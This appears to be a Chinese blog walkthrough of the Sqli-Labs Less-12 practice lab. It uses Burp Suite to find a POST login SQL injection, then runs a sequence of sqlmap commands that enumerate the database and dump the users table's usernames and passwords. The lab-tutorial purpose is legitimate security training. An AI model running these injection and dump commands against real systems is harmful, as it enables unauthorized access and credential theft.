数据库
首页 > 数据库> > Sqli-Labs Less12:POST注入

Sqli-Labs Less12:POST注入

作者:互联网

打开bp抓包
在这里插入图片描述
发送至Repeater,添加 \ 进行测试
在这里插入图片描述
根据报错:222") 猜测查询语句:

select uname, passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

根据猜测进行注入:
在这里插入图片描述
成功登陆。

使用sqlmap进一步测试

复制截取的数据包在kali中保存为新文件 sqli-labs-12

使用以下命令进行测试:
sqlmap -r sqli-labs-12 -p uname
在这里插入图片描述
发现无法与服务器建立连接,在思考后发现,截取的数据包中主机为 localhost ,而复制进kali后,就应该将 主机修改为 服务器的 ip :192.168.0.104
在这里插入图片描述
再次连接,成功
在这里插入图片描述
继续,奥里给,干了!

还是刚才的查询语句
sqlmap -r sqli-labs-12 -p uname

其中 -r 表示从文件读取数据(read)
-p 表示用于注入的参数

查看扫描结果:
在这里插入图片描述
出现了基于报错的注入,继续利用该类型的注入,指定注入类型为 error-based ,查询库内容

指定注入类型 E (error)
sqlmap -r sqli-labs-12 -p uname --technique E
在这里插入图片描述
查询当前数据库
sqlmap -r sqli-labs-12 -p uname --technique E --current-db
在这里插入图片描述
查询 security 库中的表
sqlmap -r sqli-labs-12 -p uname --technique E -D security --tables
在这里插入图片描述
查询 users 中的字段
qlmap -r sqli-labs-12 -p uname --technique E -D security -T users --columns
在这里插入图片描述
查询字段内容
sqlmap -r sqli-labs-12 -p uname --technique E -D security -T users -C "username, password" --dump
在这里插入图片描述
至此。

工科学生死板板 发布了82 篇原创文章 · 获赞 102 · 访问量 1万+ 私信 关注

标签:sqlmap,labs,12,sqli,technique,Labs,Sqli,uname,POST
来源: https://blog.csdn.net/qq_43968080/article/details/104004170